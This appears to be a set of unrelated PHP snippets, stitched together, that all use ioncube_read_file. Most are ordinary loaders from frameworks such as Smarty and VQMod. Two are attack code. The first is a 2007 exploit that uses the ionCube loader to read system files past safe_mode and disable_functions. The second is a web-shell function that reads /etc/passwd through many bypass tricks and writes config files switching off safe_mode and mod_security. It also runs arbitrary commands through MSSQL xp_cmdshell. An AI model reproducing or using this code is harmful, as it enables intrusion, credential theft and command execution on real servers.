function __construct($data_source, $data_source_type = 'raw', $collapse_dups = 0, $index_numeric = 0) { $this->collapse_dups = $collapse_dups; $this->index_numeric = $index_numeric; $this->data = ''; if ($data_source_type == 'raw') { $this->data = $data_source; } elseif ($data_source_type == 'stream') { while (!feof($data_source)) { $this->data .= fread($data_source, 1000); } // try filename, then if that fails... } elseif (file_exists($data_source)) { $this->data = implode('', file($data_source)); } else { // try url $fp = fopen($data_source, 'r'); while (!feof($fp)) { $this->data .= fread($fp, 1000); } fclose($fp); } //add support for load encoded files if (function_exists("ioncube_read_file")) { $data = ioncube_read_file($data_source); if (!is_int($data)) { $this->data = $data; } } elseif (substr($this->data, 0, 7) == '!odMbo!') { header("Location: " . OPENBIZ_APP_INDEX_URL . '/common/loader_not_installed'); exit; } }
public function getContent(Smarty_Template_Source $source) { if ($source->timestamp) { if (function_exists('ioncube_read_file')) { return ioncube_read_file($source->filepath); } else { return file_get_contents($source->filepath); } } if ($source instanceof Smarty_Config_Source) { throw new SmartyException("Unable to read config {$source->type} '{$source->name}'"); } throw new SmartyException("Unable to read template {$source->type} '{$source->name}'"); }
/** * Construct an instance of an object * * @param string $objName object name * @param array $xmlArr xml array * @return object the instance of the object */ protected function constructObject($objName, &$xmlArr = null) { if (!$xmlArr) { $xmlFile = BizSystem::GetXmlFileWithPath($objName); if (!$xmlFile) { $dotPos = strrpos($objName, "."); $package = $dotPos > 0 ? substr($objName, 0, $dotPos) : null; $class = $dotPos > 0 ? substr($objName, $dotPos + 1) : $objName; } else { $xmlArr = BizSystem::getXmlArray($xmlFile); } } if ($xmlArr) { $keys = array_keys($xmlArr); $root = $keys[0]; // add by mr_a_ton , atrubut name must match with object name $dotPos = strrpos($objName, "."); $shortObjectName = $dotPos > 0 ? substr($objName, $dotPos + 1) : $objName; if ($xmlArr[$root]["ATTRIBUTES"]["NAME"] == "") { $xmlArr[$root]["ATTRIBUTES"]["NAME"] = $shortObjectName; } else { if ($shortObjectName != $xmlArr[$root]["ATTRIBUTES"]["NAME"]) { trigger_error("Metadata file parsing error for object {$objName}. Name attribut [" . $xmlArr[$root]["ATTRIBUTES"]["NAME"] . "] not same with object name. Please double check your metadata xml file again.", E_USER_ERROR); } } //$package = $xmlArr[$root]["ATTRIBUTES"]["PACKAGE"]; $class = $xmlArr[$root]["ATTRIBUTES"]["CLASS"]; // if class has package name as prefix, change the package to the prefix $dotPos = strrpos($class, "."); $classPrefix = $dotPos > 0 ? substr($class, 0, $dotPos) : null; $classPackage = $classPrefix ? $classPrefix : null; if ($classPrefix) { $class = substr($class, $dotPos + 1); } // set object package $dotPos = strrpos($objName, "."); $package = $dotPos > 0 ? substr($objName, 0, $dotPos) : null; if (strpos($package, '@') === 0) { $package = substr($package, 1); } if (!$classPackage) { $classPackage = $package; } $xmlArr[$root]["ATTRIBUTES"]["PACKAGE"] = $package; } if ($class == "BizObj") { // convert BizObj to BizDataObj, support <1.2 version $class = "BizDataObj"; } if (!class_exists($class, false)) { $classFile = BizClassLoader::getLibFileWithPath($class, $classPackage); if (!$classFile) { if ($package) { trigger_error("Cannot find the class with name as {$package}.{$class}", E_USER_ERROR); } else { trigger_error("Cannot find the class with name as {$class} of {$objName}", E_USER_ERROR); } exit; } include_once $classFile; } if (class_exists($class, false)) { //if ($objName == "collab.calendar.form.EventListForm") { print_r($xmlArr); exit; } $obj_ref = new $class($xmlArr); if ($obj_ref) { return $obj_ref; } } else { if (function_exists("ioncube_read_file")) { $data = ioncube_read_file($classFile); if (!strpos($data, "ionCube Loader")) { trigger_error("Cannot find the class with name as {$class} in {$classFile}", E_USER_ERROR); } else { } } } return null; }
//mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //Tested on xp Pro sp2 full patched, worked both from the cli and on apache //Technical details: //ionCube version: 6.5 //extension: ioncube_loader_win_5.2.dll (other may also be vulnerable) //url: www.ioncube.com //php.ini settings: //safe_mode = On //disable_functions = ioncube_read_file, readfile //Description: //This is useful to obtain juicy informations but also to retrieve source //code of php pages, password files, etc... you just need to change file path. //Anyway, don't worry, nobody will read your obfuscated code :) //greetz to: BlackLight for help me to understand better PHP //P.S. //This extension contains even an interesting ioncube_write_file function... if (!extension_loaded("ionCube Loader")) { die("ionCube Loader extension required!"); } $path = str_repeat("..\\", 20); $MyBoot_readfile = readfile($path . "windows\\system.ini"); #just to be sure that I set correctely disable_function :) $MyBoot_ioncube = ioncube_read_file($path . "boot.ini"); echo $MyBoot_readfile; echo "<br><br>ionCube output:<br><br>"; echo $MyBoot_ioncube; ?> # milw0rm.com [2007-10-11]
/** * This will take the passed file and try to * work out if it is an encoded/encrypted * ioncube file. * It dosent test the file exten, as it * expects the calling method to have done * that before. * * @param string $filename Filename, with path, to check * * @return boolean True if file was encoded/encrypted */ private function checkFileCoding($filename) { // check to see if this is an encrypted file $ioncube = ioncube_read_file($filename, $ioncubeType); if (is_int($ioncube)) { // we got an error from ioncube, so its encrypted return true; } // read first line of file $f = fopen($filename, 'r'); $line = trim(fgets($f, 32)); fclose($f); // if first line is longer than 30, then this isnt a php file if (strlen($line) > 30) { return false; } // if first line starts '<?php //0' then we can be pretty certain its encoded if (substr($line, 0, 9) == '<?php //0') { return true; } // otherwise its most likley un-encrypted/encoded return false; }
function safemodE() { global $windows, $hcwd; $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file']; $pr = "\r\n</font><font color=green>Method "; $po = ")</font><font color=#FA0>\r\n"; $i = 1; if (!empty($_REQUEST['read'])) { echo "<pre>{$pr}{$i}:(ini_restore{$po}"; ini_restore('safe_mode'); ini_restore('open_basedir'); readfile($file); $i++; if (checkfunctioN("ioncube_read_file")) { echo "{$pr}{$i}:(ionCube{$po}"; echo ioncube_read_file($file); $i++; } if (checkfunctioN('symlink')) { echo "{$pr}{$i}:(symlink{$po}"; $lnk = whereistmP() . DIRECTORY_SEPARATOR . uniqid('lnk_'); @symlink($file, $lnk); @readfile($lnk); @unlink($lnk); $i++; } echo "{$pr}{$i}:(include{$po}"; include $file; $i++; echo "{$pr}{$i}:(copy{$po}"; $tmp = tempnam('', 'cx'); copy('compress.zlib://' . $file, $tmp); $fh = fopen($tmp, 'r'); $data = fread($fh, filesize($tmp)); fclose($fh); echo $data; $i++; if (checkfunctioN('mb_send_mail')) { echo "{$pr}{$i}:(mb_send_mail{$po}"; if (file_exists('/tmp/mb_send_mail')) { unlink('/tmp/mb_send_mail'); } mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail'); readfile('/tmp/mb_send_mail'); $i++; } if (checkfunctioN('curl_init')) { echo "{$pr}{$i}:(curl_init [A]{$po}"; $fh = curl_init('file://' . $file . ''); $tmp = curl_exec($fh); echo $tmp; $i++; echo "{$pr}{$i}:(curl_init [B]{$po}"; $i++; if (strstr($file, DIRECTORY_SEPARATOR)) { $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__); } else { $ch = curl_init('file://' . $file . "" . __FILE__); } var_dump(curl_exec($ch)); } if ($windows) { echo "{$pr}{$i}:(shell{$po}"; echo shelL("type \"{$file}\""); $i++; } else { echo "{$pr}{$i}:(shell{$po}"; echo shelL("cat {$file}"); $i++; } if (checkfunctioN('imap_open')) { echo "{$pr}{$i}:(imap [A]{$po}"; $str = imap_open('/etc/passwd', '', ''); $list = imap_list($str, $file, '*'); for ($i = 0; $i < count($list); $i++) { echo $list[$i] . "\n"; } imap_close($str); $i++; echo "{$pr}{$i}:(imap [B]{$po}"; $str = imap_open($file, '', ''); $tmp = imap_body($str, 1); echo $tmp; imap_close($str); $i++; } if ($file == '/etc/passwd') { echo "{$pr}{$i}:(posix{$po}"; for ($uid = 0; $uid < 99999; $uid++) { $h = posix_getpwuid($uid); if (!empty($h)) { foreach ($h as $k => $v) { echo "{$v}"; if ($k != 'shell') { echo ":"; } } echo "\r\n"; } } } echo "\n</pre></font>"; } elseif (!empty($_REQUEST['show'])) { echo "<pre>{$pr}{$i}:(glob{$po}"; $con = glob("{$file}*"); foreach ($con as $v) { echo "{$v}\n"; } $i++; if (checkfunctioN('imap_open')) { echo "{$pr}{$i}:(imap{$po}"; $str = imap_open('/etc/passwd', '', ''); $s = explode("|", $file); if (count($s) > 1) { $list = imap_list($str, trim($s[0]), trim($s[1])); } else { $list = imap_list($str, trim($str[0]), '*'); } for ($i = 0; $i < count($list); $i++) { echo "{$list[$i]}\r\n"; } imap_close($str); $i++; } if (class_exists('COM')) { echo "{$pr}{$i}:(COM{$po}"; $ws = new COM('WScript.Shell'); $exec = comshelL("dir \"{$file}\"", $ws); $exec = str_replace("\t", '', $exec); echo $exec; $i++; } if (checkfunctioN('win_shell_execute')) { echo "{$pr}{$i}:(win32std{$po}"; echo winshelL("dir \"{$file}\""); $i++; } if (checkfunctioN('win32_create_service')) { echo "{$pr}{$i}:(win32service{$po}"; echo srvshelL("dir \"{$file}\""); } echo "\n</pre></font>"; } elseif (!empty($_REQUEST['create'])) { $i = 1; $dir = dirname(__FILE__) . DIRECTORY_SEPARATOR; if (is_writable($dir)) { echo "<pre>{$pr}{$i}:(php.ini{$po}"; file_put_contents($dir . 'php.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off"); echo "\nphp.ini created!\n"; $i++; echo "{$pr}{$i}:(ini.ini{$po}"; file_put_contents($dir . 'ini.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off"); echo "\nini.ini created!\n"; $i++; echo "{$pr}{$i}:(.htaccess{$po}"; file_put_contents($dir . '.htaccess', "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckCookieFormat Off\r\nSecFilterNormalizeCookies Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>"); echo "\n.htaccess created!\n"; echo "\nCheck if safe-mode is off.\n</pre></font>"; } else { echo "Local directory is not writable!"; } } elseif (!empty($_REQUEST['sql'])) { $ta = uniqid('N'); $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}"); $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']); mysql_select_db($_REQUEST['db'], $l); echo '<pre><font color=#FA0>'; foreach ($s as $v) { $q = mysql_query($v, $l); while ($d = mysql_fetch_row($q)) { echo htmlspecialchars($d[0]); } } echo '</pre></font>'; } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) { $res = ''; $tb = uniqid('NJ'); $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']); mssql_select_db($_REQUEST['dB'], $db); mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db); mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db); $re = mssql_query("select * from {$tb}", $db); while ($row = mssql_fetch_row($re)) { $res .= $row[0] . "\r\n"; } mssql_query("drop table {$tb}", $db); mssql_close($db); echo "<div align=center><textarea rows='18' cols='64'>{$res}</textarea></div><br>"; } $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd'; $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'root'; $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456'; $d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test'; echo ' <form name="client" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">Disable safe-mode & mod_sec</label> </div><div class="fieldwrapper"> <label class="styled">Create config files:</label> <div class="thefield"> php.ini<br /> ini.ini<br /> .htaccess<br /> </div> </div>' . $hcwd . '<div class="buttonsdiv"> <input type="submit" name="create" value="Create" style="margin-left: 150px;" /> </div> </form> <br /> <form name="client" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">Use PHP Bugs</label> </div><div class="fieldwrapper"> <label class="styled">File:</label> <div class="thefield"> <input type="text" name="file" value="' . $f . '" size="30" /> </div> </div>' . $hcwd . '<div class="buttonsdiv"> <input type="submit" name="read" value="Read File" style="margin-left: 150px;" /> </div> <div class="buttonsdiv"> <input type="submit" name="show" value="List directory" style="margin-left: 150px;" /> </div> </form> <br /> <form name="client1" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">Use MySQL</label> </div><div class="fieldwrapper"> <label class="styled">File:</label> <div class="thefield"> <input type="text" name="file" value="' . $f . '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" value="' . $u . '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Password:</label> <div class="thefield"> <input type="text" name="pass" value="' . $p . '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Database:</label> <div class="thefield"> <input type="text" name="db" value="' . $d . '" size="30" /> </div> </div>' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="sql" value="Read" style="margin-left: 150px;" /> </div> </form> <br /> <form name="client2" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">MSSQL Exec</label> </div><div class="fieldwrapper"> <label class="styled">Server:</label> <div class="thefield"> <input type="text" name="serveR" value="'; if (!empty($_REQUEST['serveR'])) { echo htmlspecialchars($_REQUEST['serveR']); } else { echo 'localhost'; } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="useR" value="'; if (!empty($_REQUEST['useR'])) { echo htmlspecialchars($_REQUEST['useR']); } else { echo 'sa'; } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Password:</label> <div class="thefield"> <input type="text" name="pasS" value="'; if (!empty($_REQUEST['pasS'])) { echo htmlspecialchars($_REQUEST['pasS']); } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Command:</label> <div class="thefield"> <input type="text" name="coM" value="'; if (!empty($_REQUEST['coM'])) { echo htmlspecialchars($_REQUEST['coM']); } else { echo 'dir c:'; } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Database:</label> <div class="thefield"> <input type="text" name="dB" value="'; if (!empty($_REQUEST['dB'])) { echo htmlspecialchars($_REQUEST['dB']); } else { echo 'master'; } echo '" size="30" /> </div> </div>' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" value="Execute" style="margin-left: 150px;" /> </div> </form> '; }
/** * VQMod::_getMods() * * @return null * @description Gets list of XML files in vqmod xml folder for processing */ private function _getMods() { $this->_modFileList = $this->_getModFileList(); foreach ($this->_modFileList as $file) { if (file_exists($file)) { $lastMod = filemtime($file); if ($lastMod > $this->_lastModifiedTime) { $this->_lastModifiedTime = $lastMod; } } } $xml_folder_time = filemtime($this->path('ext/vqmod/xml')); if ($xml_folder_time > $this->_lastModifiedTime) { $this->_lastModifiedTime = $xml_folder_time; } $modCache = $this->path($this->modCache); if ($this->_devMode || !file_exists($modCache)) { $this->_lastModifiedTime = time(); } elseif (file_exists($modCache) && filemtime($modCache) >= $this->_lastModifiedTime) { if (function_exists('ioncube_read_file')) { $mods = ioncube_read_file($modCache); if (is_int($mods)) { $mods = false; } } else { $mods = file_get_contents($modCache); } if (!empty($mods)) { $this->_mods = unserialize($mods); } if ($this->_mods !== false) { return; } } if ($this->_modFileList) { $this->_parseMods(); } else { $this->log->write('NO MODS IN USE'); } }
function _read_file($filename) { $res = false; if (file_exists($filename)) { if (function_exists('ioncube_read_file')) { $res = ioncube_read_file($filename); if (is_int($res)) { $res = false; } } else { if ($fd = @fopen($filename, 'rb')) { $res = ($size = filesize($filename)) ? fread($fd, $size) : ''; fclose($fd); } } } return $res; }